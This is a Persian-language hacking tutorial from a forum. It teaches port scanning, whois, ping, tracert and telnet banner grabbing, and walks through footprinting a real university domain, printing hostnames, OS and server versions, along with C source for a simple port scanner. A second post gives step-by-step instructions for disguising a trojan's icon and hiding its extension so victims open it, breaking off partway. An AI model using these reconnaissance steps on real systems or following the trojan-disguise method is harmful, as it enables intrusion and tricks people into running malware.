مرحله دارد که به آن TCPs 3-way handshakeمیگويند: ۱- اول کامپيوتر ما به سمت سرور يک SYN packet میفرستد که به معنی درخواست اتصال است. ۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet میفرستد. ۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور میفرستد. نوع ديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا میتواند ما را رديابی کنند، به جای آن میتوان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ از بالا انجام میشود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است. انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan چگونه میتوان عمل Port scanning را انجام داد؟ در تمام مطالبی که تا اين مرحله گفتهام سعی کردهام که فقط از ابزارهای موجود در ويندوز استفاده کنم و هيچ ابزار ديگری بهکار نبرم، اما در مبحث پورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين کار نيست، بهناچار بايد يک سری برنامه را از اينترنت داونلود کنيد. (توجه داشته باشيد که فعلا حرفی از لينوکس نزدهام و سعی میکنم فعلا هيچ بحثی را در مورد آن مطرح نکنم) برای Port Scanning میتوان از ابزارهای مختلفی استفاده کرد که اکثرا برای لينوکس طراحی شدهاند، اما مهمترين پورت اسکنرها برای ويندوز عبارتند از: ۱- نرمافزار NMapWin v1.3.0 : نسخه گرافيکی و مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده میشود). nmap از کاملترين ابزارهايی است که هکرها استفاده میکنند که علاوه بر توانايی انواع پورت اسکنينگها، میتواند کارهای بسياری چون تشخيص سيستمعامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کار ما بيش از حد کامله ;-) ۲- NetScanTools Pro 2000 : اين هم از بهترينهاست ولی چون پولی است به جای داونلود بايد در CD هايی که در بازار هست پيدايش کنيد. ۳- WinScan : برای اسکن کردن TCP (ونه UDP) میتوانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد. ۴- ipEye v1.2 : من در این درس از اين نرمافزار استفاده خواهم کرد، برای داونلود آن میتوانيد به سايت [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] مراجعه کنيد يا مستقيما با کليک روی اين لينک آن را داونلود کنيد. لازم است بگويم که اين نرمافزار فقط در ويندوز ۲۰۰۰ و xp کار میکند و نيز در يک بار اجرا فقط يک ip را میتواند تست کند. ضمنا فقط TCP را تست میکند. چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟ با تايپ ipEye در command prompt اين نتايج ظاهر میشود: ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] Error: Too few parameters. Usage: ipEye -p [optional parameters] ipEye -p [optional parameters] is one of the following: -syn = SYN scan -fin = FIN scan -null = Null scan -xmas = Xmas scan>br> (note: FIN, Null and Xmas scans dont work against Windows systems. [optional parameters] are selected from the following: -sip = source IP for the scan -sp = source port for the scan -d = delay between scanned ports in milliseconds (default set to 750 ms) فرض کنيد که میخواهيم سايت سازين را از نظر پورتها از پورت ۱ تا ۲۰۰ تست کنيم. اول بايد ip آن را به دست بياوريم که میشود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسی میکنيم: ipeye 63.148.227.65 -syn -p 1 200 دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200- يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم میشود ست کرد که فعلا به درد ما نمیخورد. با اجرای اين دستور به نتايج زير میرسيم: ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 1-20 [drop] 21 [open] 22 [closed or reject] 23-24 [drop] 25 [open] 26-52 [drop] 53 [open] 54-79 [drop] 80 [open] 81-109 [drop] 110 [open] 111-142 [drop] 143 [open] 144-200 [drop] 201-65535 [not scanned] Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمیدهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمیدهد، Drop يعنی اينکه يک firewall همهچيز را پس میزند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز. در مورد سازين میبينيد که از بين پورتهای ۱ تا ۲۰۰ ، پورتهای ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و میتوان به آنها telnet کرد. دقت کنيد که تا تمام پورتهايی که مشخص شده، تست نشده است، هيچ نتيجهای نشان داده نمیشود و يهکم صبر میخواد. ادامه بحث whois قبلا در مورد ip whois و dns whois صحبت کردم. بحث dns whois (کسب اطلاعات در مورد يک domain خاص) رو ادامه میدم. در درس قبلی از سايت SamSpade استفاده کردم. اگر اين whois رو تست کرده باشيد، میدانيد که برای يک سری از domain (دامنه) ها، جواب نمیدهد. مثال آن سايتهايی است که دارای دامنه جغرافيايی مثلا ايران هستند، در مورد دامنههای جغرافيايی ايران بايد گفت که به ir. ختم میشوند ( مثلا: neda.net.ir ). مثال ديگری که در whois سايت SamSpade کار نمیکند، تعدادی از دامنههای org , .net , .com. هستند که در internic.net ثبت نشدهاند، بلکه در domainpeople.com ثبت شدهاند ( مثلا sanjesh.org ). چند سال پيش ثبت domain هايی که در گروه org, net, com بودند، مختص به internic.net بود ولی الان ديگر اينطور نيست. کاری که شما بايد برای whois کردن بايد انجام دهيد، توجه به نوع آن domain است که از نوع com است يا ir است يا biz است و ... بعد از آن از يکی از سايتهای زير استفاده کنيد : ۱- internic.net : برای edu , org , net , com عالی است. برای museum , int , info , coop , biz , arpa, aero هم میتواند استفاده شود. صفحه وب مربوطه عبارت است از [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] يا میتوانيد مستقيما در مرورگر بنويسيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) که بهجای xxxxxxxx مثلا بايد بنويسيد: far30.com ۲- nic.ir : برای ir استفاده میشود. صفحه وب مربوطه عبارت است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ۳- [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) : برای cc , info , biz , tv عالی است. صفحه وب مربوطه عبارت است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] يا میتوانيد مستقيما در مرورگر بنويسيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) که اگر بخواهم مثلا ----.tv را whois کنم بهجای yyyyy بايد بنويسيد ---- و به جای zzzz بايد بنويسيد tv ۴- domainpeople.com : برای name , biz , info , org , net , com عالی است. صفحه وب مربوطه عبارت است از /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] همانطور که ملاحظه میفرماييد، org , net , com در ۱ و ۴ مشترک است. علت آن است که بعضیها در اولی و بعضیها در چهارمی ثبت میشوند ولی برای whois کردن فرقی نمیکنه که شما از اولی استفاده کنيد يا چهارمی چون همديگر رو ساپورت میکنند. ping چيست ؟ ping دستوری است که مشخص میکند که آيا يک کامپيوتر خاص که ما ip يا domain آن را میدانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بستههای tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است. کاربرد اين دستور به صورت زير است: ping ip-or-domain که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را میگذاريم. مثلا ping prdev.com را در command prompt تايپ کردم و به نتايج زير رسيدم : Pinging prdev.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105 Reply from 63.148.227.65: bytes=32 time=941ms TTL=105 Reply from 63.148.227.65: bytes=32 time=981ms TTL=105 Reply from 63.148.227.65: bytes=32 time=851ms TTL=105 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 851ms, Maximum = 1402ms, Average = 1043ms اين نتايج نشان میدهد که prdev.com فعال است. حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان prdev.com است)، ping میکنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را میدهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر میکنم : Pinging 63.148.227.65 with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=861ms TTL=105 Reply from 63.148.227.65: bytes=32 time=852ms TTL=105 Reply from 63.148.227.65: bytes=32 time=851ms TTL=105 Reply from 63.148.227.65: bytes=32 time=881ms TTL=105 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 851ms, Maximum = 881ms, Average = 861ms فرض کنيد که به يک ip که فعال نيست، ping کنيم: Pinging 217.66.196.1 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 217.66.196.1: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms که نشان میدهد که آن ip در آن لحظه فعال نيست. البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شدهايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است. tracert چيست ؟ tracert ( در يونيکس میشود traceroute ) ابزاری است که نشان میدهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی میکند و از چه کامپيوترهايی میگذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص میکنيم و معمولا همان کامپيوتری است که داريم footprinting میکنيم. کاربرد اين دستور به صورت زير است: tracert ip-or-domain مثلا میخواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به prdev.com برسيم. برای اينکار میتوان از يکی از دستورهای زير استفاده کرد: tracert prdev.com tracert 63.148.227.65 به نتيجه زير رسيدم: Tracing route to prdev.com [63.148.227.65] over a maximum of 30 hops: 1 160 ms 160 ms 160 ms 217.218.84.3 2 381 ms 691 ms 1772 ms 217.218.84.5 3 * * 2324 ms 217.218.77.1 4 201 ms 1101 ms 180 ms 217.218.0.252 5 341 ms 220 ms 180 ms 217.218.0.2 6 1993 ms 180 ms 181 ms 217.218.158.41 7 180 ms 160 ms 160 ms 195.146.63.101 8 2824 ms * * 195.146.32.134 9 1472 ms 1463 ms 871 ms 195.146.33.73 10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161] 11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77] 12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245] 13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134] 14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174] 15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62] 16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33] 17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205] 18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197] 19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210] 20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94] 21 852 ms * 882 ms 64.156.25.74 22 961 ms 942 ms 841 ms 63.148.227.65 Trace complete. اين نتايج نشان میدهد که بايد از ۲۲ کامپيوتر بگذرم تا به prdev.com برسم. اين اطلاعات همانطور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروالها و ... است. (بعضی سطرها رو کوتاه کردم و بهجاش .... گذاشتم) tracert دارای تعدادی switch است که دوتاش رو توضيح میدم: d- == > با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده میشود. مثلا مینويسيم: tracert prdev.com -d h max-hops- ==> حداکثر تعداد گامها را تعيين میکند. حالت پيشفرض ۳۰ است. مثلا مینويسيم: tracert prdev.com -h 50 از اين دستور بعدا بسيار استفاده خواهيم کرد. تکميل ليست پورتها قبلا در مورد مهمترين پورتها صحبت کردم. حالا يک ليست کاملتر را در اين درس ميگم. اگر ميخواهيد يک مرجع نسبتا کامل براي مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد این درس و نيز لينک بالا هيچ بحثي در مورد تروجانها نميکند زيرا تروجانهاي شناخته شده هم يک سري پورت پيشفرض دارند که در جاي خود بحث خواهد شد. Ports TCP/UDP Service or Application ------ ------- ---------------------------------------- 7 tcp echo 11 tcp systat 19 tcp chargen 21 tcp ftp-data 22 tcp ssh 23 tcp telnet 25 tcp smtp 42 tcp nameserver 43 tcp whois 49 udp tacacs 53 udp dns-lookup 53 tcp dns-zone 66 tcp oracle-sqlnet 69 udp tftp 79 tcp finger 80 tcp http 81 tcp alternative for http 88 tcp kerberos or alternative for http 109 tcp pop2 110 tcp pop3 111 tcp sunrpc 118 tcp sqlserv 119 tcp nntp 135 tcp ntrpc-or-dec 139 tcp netbios 143 tcp imap 161 udp snmp 162 udp snmp-trap 179 tcp bgp 256 tcp snmp-checkpoint 389 tcp ldap 396 tcp netware-ip 407 tcp timbuktu 443 tcp [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 445 tcp ms-smb-alternate 445 udp ms-smb-alternate 500 udp ipsec-internet-key-exchange (ike) 513 tcp rlogin 513 udp rwho 514 tcp rshell 514 udp syslog 515 tcp printer 515 udp printer 520 udp router 524 tcp netware-ncp 799 tcp remotely possible 1080 tcp socks 1313 tcp bmc-patrol-db 1352 tcp notes 1433 tcp ms-sql 1494 tcp citrix 1498 tcp sybase-sql-anywhere 1524 tcp ingres-lock 1525 tcp oracle-srv 1527 tcp oracle-tli 1723 tcp pptp 1745 tcp winsock-proxy 2000 tcp remotely-anywhere 2001 tcp cisco-mgmt 2049 tcp nfs 2301 tcp compaq-web 2447 tcp openview 2998 tcp realsecure 3268 tcp ms-active-dir-global-catalog 3268 udp ms-active-dir-global-catalog 3300 tcp bmc-patrol-agent 3306 tcp mysql 3351 tcp ssql 3389 tcp ms-termserv 4001 tcp cisco-mgmt 4045 tcp nfs-lockd 5631 tcp pcanywhere 5800 tcp vnc 6000 tcp xwindows 6001 tcp cisco-mgmt 6549 tcp apc 6667 tcp irc 8000 tcp web 8001 tcp web 8002 tcp web 8080 tcp web 9001 tcp cisco-xremote 12345 tcp netbus 26000 tcp quake 31337 udp backorifice 32771 tcp rpc-solaris 32780 udp snmp-solaris 43188 tcp reachout 65301 tcp pcanywhere-def ادامه بحث telnet telnet هم جزو مواردي است که در footprinting مورد استفاده قرار ميگيرد. کاربرد آن در حالتيست که بخواهيم بدانيم که روي فلان پورت چه برنامهاي فالگوشه و version آن چنده. به اين صورت که به يک پورت خاص (که ميدانيم روي آن سرور باز است) تلنت ميکنيم و بعد ميبينيم که نتايجي ظاهر ميشود که نشاندهنده اطلاعاتي است که بهکار ميرود. گاهي با مکثي طولاني مواجه ميشويم و هيچ چيزي نمايش داده نميشود، در اين حالت يکي دوبار , Ctrl+Z , Ctrl+D , Ctrl+C , Ctrl+break را ميزنيم و خارج ميشويم. در مثال پايين جمعبندي مواردي که تا حالا از footprinting گفتهام را ميآورم. جمعبندي مطالب گفته شده و بررسي يک سايت فرض کنيد ميخواهيم در مورد [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) اطلاعاتي کسب کنيم : ◊ اول به سايت پينگ ميکنم و ip آن را بهدست ميآورم: 194.225.184.15 ◊ به کمک ip که بهدست آورديم، به کمک يک پورت اسکنر پورتها را بررسي ميکنيم و ميبينيم که پورتهايي مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹، ۱۴۳ و ... باز است. ◊ چون domain به ir ختم ميشود، براي whois کردن از whois.nic.ir استفاده ميکنم و Name Server آن را به دست ميآورم که 194.225.184.20 است. ◊ به کمک اين Name Server ، يک nslookup ميکنم و به نتايج زير ميرسم: iums.ac.ir. SOA sina.i........0 345600) iums.ac.ir. NS sina.iums.ac.ir iums.ac.ir. NS ns1.nic.ir iums.ac.ir. MX 10 sina.iums.ac.ir smtp.iums.ac.ir. A 195.146.34.181 sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6 sina.iums.ac.ir. MX 10 sina.iums.ac.ir sina.iums.ac.ir. A 194.225.184.20 sina.iums.ac.ir. A 195.146.34.181 sun.iums.ac.ir. CNAME sina.iums.ac.ir cisco.iums.ac.ir. CNAME router.iums.ac.ir webmail.iums.ac.ir. A 195.146.34.181 linux.iums.ac.ir. A 194.225.184.19 linux.iums.ac.ir. HINFO Intel-Xeon/800 RedHat-Linux-7.2 mta.iums.ac.ir. A 195.146.34.181 pop3.iums.ac.ir. CNAME sina.iums.ac.ir localhost.iums.ac.ir. A 127.0.0.1 proxy.iums.ac.ir. CNAME arvand.iums.ac.ir [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]). A 195.146.34.180 atrak.iums.ac.ir. A 194.225.184.14 ns1.iums.ac.ir. CNAME sina.iums.ac.ir arvand.iums.ac.ir. A 194.225.184.13 router.iums.ac.ir. A 194.225.184.1 router.iums.ac.ir. HINFO Cisco3640/Access-Server IOS-IP-12.0 iums.ac.ir. SOA sina.iu.......3456000 345600) تک تک سطرهاي اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNO صحبت ميکنم که براي مشخص تر بودن در بالا به صورت کمي فرورفتهتر نوشتم. مثلا: sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6 HIFNO براي تعيين نوع کامپيوتر و سيستمعامل سرور اهميت دارد. در اين سطر مشخص است که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفاده ميکند. ◊ چون پورتهاي باز را هم توسط پورت اسکنر به دست آوردهام به آنها تلنت ميکنم با دستور: telnet [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) portnum نتايج حاصل از بعضي را ميبينيد: 25 : ... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220 پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده ميکند. 110 : .OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+ پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده ميکند. 119 : NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed و ... يادآوری قبلا گفتم که برای اينکه هکر خوبی بشيد، زبان C را بايد ياد بگيريد. امروز اولين برنامه اينترنتی خود را به زبان C شروع میکنيم.برنامهای که امروز مینويسيم، يک پورت اسکنر ساده (Simple Port Scanner) است که acw_spscan.exe نام دارد. acw يعنی Artawill Commandline Windows و spscan يعنی Simple Port Scanner. من سورس اين برنامه را با Borland C++ 5.02 کامپايل کردم ولی فکر کنم روی هر نوع کامپايلر C ويندوز کار کند. يک سری نکات در مورد هر برنامهای که با C برای ويندوز خواهم نوشت هست که فقط امروز میگم و بعدا ديگه اشاره نخواهم کرد. ۱- هر برنامهای که من مینويسم، شامل دو فايل است که بايد داونلود کنيد: فايل اصلی که پسوند C يا CPP دارد و يک فايل به يکی از نامهای acw_sock.h يا agw_sock.h يا acu_sock.h ويا axu_sock.h که با توجه به نوع سيستمعامل (ويندوز يا يونيکس) و نوع ظاهر برنامه (خط فرمان يا گرافيکی) يکی از اين چهارتا خواهد بود. اگر برنامه برای ويندوز نوشته شده است، بايد قبل از کامپايل نهايی فايل WS2_32.LIB را هم به پروژه اضافه کنيد. ۲- هر بار که برنامه جديدی خواهم نوشت فايلی که پسوند h دارد، کامل و کاملتر میشود، پس هر وقت يک فايل جديد C يا CPP داونلود میکنيد، فايل h مربوطه را هم داونلود کنيد. ۳- کامپايلر مورد استفاده در برنامههای ويندوز Borland C++ 5.02 است. اگر از کامپايلر ديگری استفاده میکنيد، ممکن است لازم باشد که تغييراتی اعمال کنيد. ۴- سورس تمام توابع و برنامهها مشمول کپی رايت است ولی استفاده از توابع در برنامههايتان در صورت عدم اعمال تغييرات در سورس بلامانع است. درباره برنامه Artawill Command-prompt Windows - Simple Prot Scanner = acw_spscan برنامه acw_spscan.exe عمل پورت اسکنينگ را به صورت tcp و udp انجام میدهد. همانطوری که از نامش پيداست، برای ويندوز و بهصورت خط فرمان عمل میکند. اگر در command prompt تايپ کنيد: acw_spscan ،خطوط زير چاپ میشود: Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0 Programmed by Araz Samadi, ArtaWill.com Usage: acw_spscan [] بنابراين مثلا اگر بخواهم سايت پی آر دو را (که ip آن 63.148.227.65 است) برای پورتهای ۲۰ تا ۳۰ به صورت tcp اسکن کنم، بايد بنويسم: acw_spscan 63.148.227.65 20 30 tcp و جواب میشنوم: Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0 Programmed by Araz Samadi, ArtaWill.com >TCP [63.148.227.65] TCP 21 : OPEN [63.148.227.65] TCP 25 : OPEN Simple Port Scanner End. که نشان میدهد، پورتهای ۲۱ و ۲۵ باز است. بررسی سورس برنامه من برای راحتی کار برنامهنويسی شبکه، يک سری تابع تعريف کرده و آنها را در فايل acw_sock.h قرار دادهام که در برنامه اصلی آن را include میکنم. حال به بررسی توابع مورد استفاده در برنامه امروز میپردازم ( اگر خواهان اطلاعات بيشتری هستيد، سورس اين توابع را از فايل acw_sock.h بخوانيد ): ۱- (int arta_win_LoadWinsock(char, char ==> در برنامهنويسی ويندوز قبل از استفاده از سوکت(socket)، بايد WinSock را لود کرد که من اين کار را با اين تابع انجام میدهم. اگر بپرسيد سوکت چيست، میگويم سوکت ارتباطی است از نوع TCP/IP که از پورت خاصی از يک کامپيوتر به سوی يک پورت خاص از يک کامپيوتر ديگر برای رد و بدل کردن دادهها ايجاد میشود. کل برنامهنويسی شبکه به کمک C با استفاده از سوکتهاست. if(arta_win_LoadWinsock(2,0)==-1) arta_commandline_win_DieWithError("ERR: Cannot load WinSock!"); دو خط بالا برای لودکردن WinSock ورژن 2.0 بهکار میرود. ۲- (void arta_win_CleanWinsock(void ==> در آخر برنامه بايد WinSockی را که با دستور بالا ايجاد کردهايم، بهکمک دستور اين قسمت ببنديم: arta_win_CleanWinsock(); ۳- (int arta_win_CreateTcpSocket(void ==> اين تابع يک سوکت از نوع tcp ايجاد میکند. if((sock=arta_win_CreateTcpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Create Socket!"); دو خط بالا برای ايجاد يک سوکت tcp بهکار میرود. ۴- (int arta_win_CreateUdpSocket(void ==> اين تابع يک سوکت از نوع udp ايجاد میکند. if((sock=arta_win_CreateUdpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Create Socket!"); دو خط بالا برای ايجاد يک سوکت udp بهکار میرود. ۵- (void arta_win_CloseSocket(int ==> اين تابع، سوکتی را که با يکی از دو دستور بالا ايجاد کردهايم، میبندد. arta_win_CloseSocket(sock); ۶- void arta_win_CreateServerAddressStructure (* struct sockaddr_in *, unsigned short, char ) ==> اين تابع اطلاعات لازم برای برقراری اتصال را مانند IP, Port میگيرد و در يک structure مخصوص از نوع sockaddr_in قرار میدهد. اين structure در توابع بعدی بهکار میرود. arta_win_CreateServerAddressStructure(&addr,port,I P); ۷- (* int arta_win_EstablishTcpSocketConnection(int, struct sockaddr_in ==> اين تابع sock (که از تابعهای ۳ يا ۴ بهدست آمده) و addr را (که از تابع ۶ حاصل شده) میگيرد و يک ارتباط واقعی tcp تشکيل میدهد. اگر ارتباط بهوجود آمد، پورت باز است وگرنه بسته است. if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){ .... } ۸- (* int arta_win_EstablishUdpSocketConnection(int, struct sockaddr_in ==> اين تابع sock (که از تابعهای ۳ يا ۴ بهدست آمده) و addr را (که از تابع ۶ حاصل شده) میگيرد و يک ارتباط واقعی udp تشکيل میدهد. اگر ارتباط بهوجود آمد، پورت باز است وگرنه بسته است. if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){ .... } حالا يک توضيح کلی میدم: اولين سطرهای برنامه را بررسی میکنم /* An ArtaWill Production - copyright(c) ArtaWill.com */ /* Programmed by: M.E */ /* This Source code and its Functions can be used - but no .... */ /* Funcions source or code can be done ! */ #include /* for printf(), fprintf() */ #include /* for exit() */ #include /* for strings */ #include "acw_sock.h" void main(int argc, char *argv[]) { struct sockaddr_in addr; char *IP; int sock; int port; int startport, endport; int tcp_udp_both=1; arta_commandline_win_StartMessage("SimplePortScann er ......"); if ((argc != 4) && (argc != 5)) /* Test for correct ...... */ { arta_commandline_win_DieWithError("Usage: acw_spscan []\n"); exit(1); } IP = argv[1]; startport = atoi(argv[2]); endport = atoi(argv[3]); if(argc==5){ if(stricmp(argv[4],"udp")==0){tcp_udp_both=2;} else if (stricmp(argv[4],"both")==0){tcp_udp_both=3;} } if(arta_win_LoadWinsock(2,0)==-1) arta_commandline_win_DieWithError("ERR: Cannot load WinSock!"); اوايل برنامه يهسری توضيحات بعدش يک سری هدر (header) را include کردهام از جمله acw_sock.h را بعدش main شروع میشود و يک سری تعريف متغير داريم که به نوع اين متغير ها دقت کنيد. بعد از روی ورودی خط فرمان، متغيرها ست میشوند. دو سطر آخر هم يک WinSock لود میکند. حالا ادامه: if(tcp_udp_both!=2){ puts(">TCP"); for(port=startport;port<=endport;port++){ printf(" [%s] TCP %5d : Testing... ",IP,port); if((sock=arta_win_CreateTcpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Crea...."); arta_win_CreateServerAddressStructure(&addr,port,I P); if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b.... ...."); } else{ printf("\b\b\b\b\b\b\b\b\b\b\b"); printf("OPEN \n"); } arta_win_CloseSocket(sock); } } اگر قرار باشد که tcp چک شود، اين خطوط اجرا میشوند. در اين سطرها يک اتصال tcp خاص بايد ايجاد شود و اگر اين عمل موفق بود، آن پورت باز است. حالا ادامه برنامه: if(tcp_udp_both!=1){ puts(">UDP "); for(port=startport;port<=endport;port++){ printf(" [%s] UDP %5d : Testing... ",IP,port); if((sock=arta_win_CreateUdpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Cre....!"); arta_win_CreateServerAddressStructure(&addr,port,I P); if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b \b....."); } else{ printf("\b\b\b\b\b\b\b\b\b\b\b"); printf("OPEN \n"); } arta_win_CloseSocket(sock); } } همان کارها را ولی اينبار برای udp انجام میدهد. و حالا آخر برنامه: puts("\n"); arta_commandline_win_EndMessage("Simple Port Scanner"); arta_win_CloseSocket(sock); arta_win_CleanWinsock(); exit(0); } در اينجا پيغام انتهايی چاپ شده و سوکت بسته میشود.
گرفته شده ازسایت:[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نظر یادت نره
mazi_z_PSP
12-05-2007, 20:00
آیکون و پسوند تابلوی ترجان ها را به هر چی که دوست دارید [هک]
برای اینکار 2 راه موجود می باشد که من این 2 راه را برای شما میگم:
راه اول :
یک عدد فایل تروجان آماده کنید...
یه wordpad باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new برید و یه wordpad documernt باز کنید .
فایل تروجان رو کپی کنید و توی wordpad پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه word رها کنید .
حال همون فایلی رو که تو word گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید
بعد به edit برید و بعد به package object و روی برگه edit package کلیک کنید حالا در پبجره باز شده به edit برید و copy package رو بزنید .
در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste رو بزنید .
به همین آسونی فایل تروجان exe یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .
راه دوم :
